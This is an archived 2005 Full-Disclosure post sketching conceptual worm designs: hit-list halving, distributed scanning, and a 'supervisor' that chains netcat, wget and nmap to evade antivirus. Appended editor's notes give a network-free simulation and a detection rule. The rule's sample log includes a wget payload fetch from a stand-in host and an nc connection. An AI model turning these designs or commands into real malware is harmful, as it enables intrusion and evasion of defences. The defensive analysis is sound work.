[Full-Disclosure] Narmacil project : The super worms : does it already exist?

From: khaalel (khaalel_at_gmail.com)
Date: 02/25/05

    Date: Fri, 25 Feb 2005 10:44:05 +0100
    To: full-disclosure@lists.netsys.com
    
    

    Hello
    For a few months, I've been working on viruses (especially on the
    evolution of viruses) and I started to create a small theory (that I
    called Narmacil) about advanced viruses, which I will post here. My
    goal is not to help virus makers but to show how viruses can evolve
    and which methods the super worm (that everybody is waiting for)
    could use.

    First, sorry for my (perhaps bad) English!!!

    My goal is to introduce you to 2 types of almost perfect malware
    that have never been implemented for full-scale use. For information,
    some projects were nevertheless carried out. This message will not be
    followed by example code because I was advised to drop my perfect
    worm/virus project and to publish nothing, quite simply because it
    could create unjustified panic on the Net and mainly because of the
    new laws in force (in France, the country where I live).
    For the persons who could be interested, this project followed 6
    rules (being able to work on Windows and Unix systems, being
    invisible/polymorphic, being able to download the parts of code it
    is missing, adaptable to all the desires of its creator, being
    powerful on the infected system, not modifying the system) and a key
    sentence: "the viruses which succeeded best (in terms of survival)
    are those which acquire a certain longevity because they do nothing
    other than reproduce and remain invisible".

    Now, the 2 types of worms/viruses of my project.

    I] the super worm

    It could use 2 golden techniques: "hit-list scanning" and
    "distributed scanning". Viruses using these techniques also have a
    routine making it possible for the worm/virus to update itself and
    to be controllable (it then becomes a Trojan horse) using encrypted
    tunnels encapsulated in HTTP.

    * Hit-list scanning: the worm's first instance contains a list of
      potentially vulnerable machines (a list created by the author of
      the virus). With each duplication it transmits half of the list to
      the newly created worm, then removes the bequeathed part from its
      own code, and so on with each new duplication. Combining that with
      another technique, which consists in integrating a very large
      amount of obfuscation code and junk code into the first instance
      of the worm, the newly created worms will, with each duplication,
      take half of the code just mentioned.

    The "hit-list scanning" technique has two advantages: the worm does
    not really need a polymorphism engine because, with each
    duplication, it makes it possible to decrease the size of the newly
    created worms; besides, the code of each newly created worm is
    different from its creator's (thanks to the obfuscation code).

    * Distributed scanning: it differs very slightly from "hit-list
      scanning" in that, with each duplication, the parent worm
      transmits the hit-list in its totality. Then, by a distributed
      scanning mechanism, the worms make sure that they will not infect
      a system twice.

    II] the polymorphic multipartite malware with variable and
    distributed architecture

    Then I imagined this new type of malware (I say "imagined" because I
    have not yet found a malware of this type) at the time when I
    started to have trouble continuing to code my super worms perfectly
    (preceding paragraph). Here is its description:

    The malware is rather a set of small tools, each one carrying out a
    task and being used in everyday life (except the supervisor...).

    So it has a distributed and variable architecture, because it is
    composed of small tools (perhaps) already present on the victims'
    systems (the test I carried out used netcat, wget, nmap, tcpdump and
    a program allowing viruses to be put into and extracted from image
    files (coded for the occasion): in fact it is simply a piece of
    steganography software).

    I started from the principle that the victims already have netcat,
    wget, nmap and an FTP server on their systems. The only tools I will
    have to introduce into the target systems are the supervisor and the
    steganography program. The goal of this attack is to create a
    complete virus/worm that cannot be detected and removed by
    antiviruses; that is why this type of malware uses tools which
    cannot be detected as viruses and which can pass through antiviral
    analysis because they are tools used by a lot of people (like nmap:
    who would have the idea of detecting nmap as a virus?). The only
    really unknown tool is the supervisor: this tool will drive the
    other tools (which one can describe as healthy programs) according
    to its goal (let us not forget that it is malware). The other tools
    must be controllable from the shell. The other programs necessary
    for the attack will be downloaded by FTP (or wget, for example) in a
    compressed and encrypted form...

    By studying the 3 types of antiviral analysis, we see clearly that
    the supervisor will successfully pass the heuristic and the spectral
    ones because it does nothing but launch programs that all
    administrators and professionals should use. Knowing that signature
    analysis is rather limited, we have here the virus which could do
    great damage on the Net. This type of malware can be improved in all
    the ways one wants, for example: a virus having the same
    architecture, but where the developed tools are written in a
    multi-platform language and are compressed/encrypted (some firewalls
    and antiviruses will not like that lol). The purpose of the
    supervisor will be to decompress them, decipher them, launch them,
    then compress and encrypt them again with another key.

    Well, that's it. I hope this message will be useful for something,
    mainly to show antivirus vendors that they have to improve their
    antiviral techniques and that viruses have not finished evolving. As
    I mentioned above, I have not included the code I had started to
    write.

    PS: I'm working on other methods for advanced viruses, but first,
    what do you think of the 2 methods this article introduces to you?

     - Gilbert Nzeka (aka Dark Khaalel)
     - Author of a French security book ("La protection des sites
    informatiques face au hacking")
     - www.nzeka-labs.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
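Editor's note on section I of the message above. The hit-list halving scheme the author describes is the "flash worm" idea (Staniford, Paxson and Weaver, 2002): because each infected host hands half of its remaining list to the copy it creates, the list is exhausted in a number of rounds that grows only with the logarithm of its size. The simulation below is an added example, not the author's code and not a worm: "infection" is a list operation, nothing touches a network, and the addresses and junk labels are made up. It also checks the author's second claim, that halving a supply of junk blocks makes every copy's body different, and shows the condition under which that holds.

```python
"""Simulation of the hit-list halving scheme described in the post.

Constructed example, not the author's code. A worm instance holding a list
of targets "infects" the first one, keeps half of the remainder and hands the
other half, together with half of its junk/obfuscation blocks, to the new
copy. Nothing here touches a network: infection is a list operation, and the
hosts and junk labels below are made up.
"""
import hashlib


def fingerprint(junk_blocks):
    """Stand-in for a copy's on-disk body: a hash of the junk it carries."""
    return hashlib.sha256("|".join(junk_blocks).encode()).hexdigest()[:16]


def hit_list_rounds(hit_list, junk_blocks):
    """Run the halving scheme to completion.

    Returns a list of rounds; each round is a list of
    (target, fingerprint_of_new_copy) for the hosts infected in that round.
    """
    # Each live instance is (targets it still owns, junk it carries).
    active = [(list(hit_list), list(junk_blocks))]
    rounds = []
    while active:
        next_active = []
        infected_now = []
        for targets, junk in active:
            if not targets:
                continue  # this instance has exhausted its share of the list
            target, rest = targets[0], targets[1:]
            # Split what is left: the parent keeps the first half, the new copy
            # receives the second half. The junk blocks are halved the same way.
            t_mid, j_mid = len(rest) // 2, len(junk) // 2
            parent_share = (rest[:t_mid], junk[:j_mid])
            child_share = (rest[t_mid:], junk[j_mid:])
            infected_now.append((target, fingerprint(child_share[1])))
            next_active.extend([parent_share, child_share])
        if infected_now:
            rounds.append(infected_now)
        active = next_active
    return rounds


def summarize(rounds):
    """Rounds taken, hosts hit, double infections, and distinct copy bodies."""
    targets = [t for rnd in rounds for t, _ in rnd]
    bodies = [fp for rnd in rounds for _, fp in rnd]
    return {
        "rounds": len(rounds),
        "infected": len(targets),
        "duplicates": len(targets) - len(set(targets)),
        "distinct_bodies": len(set(bodies)),
    }


def expected_rounds(n_targets):
    """A share of n targets shrinks to at most n // 2 per round, so the
    longest lineage needs bit_length(n) rounds: 1000 targets -> 10 rounds."""
    return n_targets.bit_length()


# Constructed inputs: 1000 private addresses and two sizes of junk supply.
HIT_LIST = [f"10.0.{i // 256}.{i % 256}" for i in range(1000)]
JUNK_SMALL = [f"junk{i:04d}" for i in range(64)]
JUNK_ENOUGH = [f"junk{i:04d}" for i in range(1024)]


def run_demo():
    """Returns the two summaries so the effect of the junk supply is visible."""
    small = summarize(hit_list_rounds(HIT_LIST, JUNK_SMALL))
    enough = summarize(hit_list_rounds(HIT_LIST, JUNK_ENOUGH))
    return small, enough


if __name__ == "__main__":
    for label, summary in zip(("64 junk blocks", "1024 junk blocks"), run_demo()):
        print(label, summary)
```

Two things the run makes concrete. The partition guarantees no host is hit twice and 1000 targets fall in 10 rounds, which is why hit-list scanning is fast. The "no polymorphism engine needed" part only holds while there is junk left to halve: with 64 blocks the supply runs out around round 6 and later copies are identical, whereas with 1024 blocks (the smallest power of two strictly above the list size) all 1000 bodies differ. In other words the scheme ships roughly one junk block per intended victim, a size cost the author's message does not mention.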

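Editor's note on section II of the message above. The author is right that nmap, netcat, wget and an FTP client will not be flagged by signature or heuristic scanning of their own binaries; the signal a defender has is the unknown parent that chains them. The rule below is an added example (not from the post, and not any product's logic) that runs over a constructed process-creation log: the log format, process names, thresholds and `.invalid` hostnames are all assumptions for the demo.

```python
"""Detecting a 'supervisor' that drives benign tools from process-creation logs.

Constructed example, not from the post. The post's point is that nmap, netcat,
wget and an FTP client are not malware and will not be flagged on their own;
the defender's signal is the unknown parent that chains them. The log format,
the process names and the rule thresholds below are assumptions for this demo.
Each line: <epoch> pid=<n> ppid=<n> parent=<name> image=<name> cmdline=<text>
"""
import re
from collections import defaultdict

# Building blocks named in the post, plus their common equivalents.
DUAL_USE_TOOLS = {"nmap", "nc", "netcat", "wget", "curl", "ftp", "tcpdump"}
# Parents that usually mean a human typed the command (lower, not zero, suspicion).
INTERACTIVE_SHELLS = {"bash", "sh", "zsh", "ksh"}
WINDOW_SECONDS = 60
MIN_DISTINCT_TOOLS = 2

EVENT_RE = re.compile(
    r"^(?P<ts>\d+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) "
    r"parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$"
)

# Constructed sample: an admin running one nmap from an ssh shell, a backup job
# using ftp, and an unknown binary chaining wget -> nmap -> nc within 11 seconds.
SAMPLE_LOG = """\
1109324405 pid=2001 ppid=1 parent=init image=cron cmdline=/usr/sbin/cron
1109324410 pid=2100 ppid=1999 parent=sshd image=bash cmdline=-bash
1109324420 pid=2101 ppid=2100 parent=bash image=nmap cmdline=nmap -sP 10.0.0.0/24
1109324430 pid=3000 ppid=2999 parent=update_helper image=wget cmdline=wget -q http://cdn.example.invalid/p.jpg -O /tmp/.p.jpg
1109324436 pid=3001 ppid=2999 parent=update_helper image=nmap cmdline=nmap -p 21,22,80 10.0.1.0/24 -oG /tmp/.s
1109324441 pid=3002 ppid=2999 parent=update_helper image=nc cmdline=nc 10.0.1.7 21
1109324490 pid=3100 ppid=3099 parent=backup.sh image=ftp cmdline=ftp -n backup.example.invalid
"""


def parse_events(lines):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        for key in ("ts", "pid", "ppid"):
            e[key] = int(e[key])
        events.append(e)
    return events


def detect_supervisor(events, window=WINDOW_SECONDS, min_tools=MIN_DISTINCT_TOOLS):
    """Alert on any parent that launches >= min_tools distinct dual-use tools
    within `window` seconds. One alert per parent, on the first qualifying burst."""
    launches = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["image"] in DUAL_USE_TOOLS:
            launches[(e["ppid"], e["parent"])].append(e)

    alerts = []
    for (ppid, parent), kids in launches.items():
        for i, first in enumerate(kids):  # sliding window anchored on each launch
            burst = [k for k in kids[i:] if k["ts"] - first["ts"] <= window]
            tools = sorted({k["image"] for k in burst})
            if len(tools) >= min_tools:
                alerts.append({
                    "ppid": ppid,
                    "parent": parent,
                    "tools": tools,
                    "start": first["ts"],
                    "interactive_parent": parent in INTERACTIVE_SHELLS,
                    "cmdlines": [k["cmdline"] for k in burst],
                })
                break
    return alerts


def run_sample():
    """Run the rule over the constructed log; returns the alert list."""
    return detect_supervisor(parse_events(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for alert in run_sample():
        print(f"parent={alert['parent']} pid={alert['ppid']} tools={alert['tools']} "
              f"interactive={alert['interactive_parent']}")
```

On the sample, only `update_helper` (an unknown, non-interactive parent launching wget, nmap and nc within the window) produces an alert; the admin's single nmap from bash and the backup job's ftp do not. The trade-off is real: an administrator's own script that runs wget and nmap back to back trips the same rule, so in practice the parent image is compared against a known-good list and the `interactive_parent` flag is used to lower the severity rather than suppress the event.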
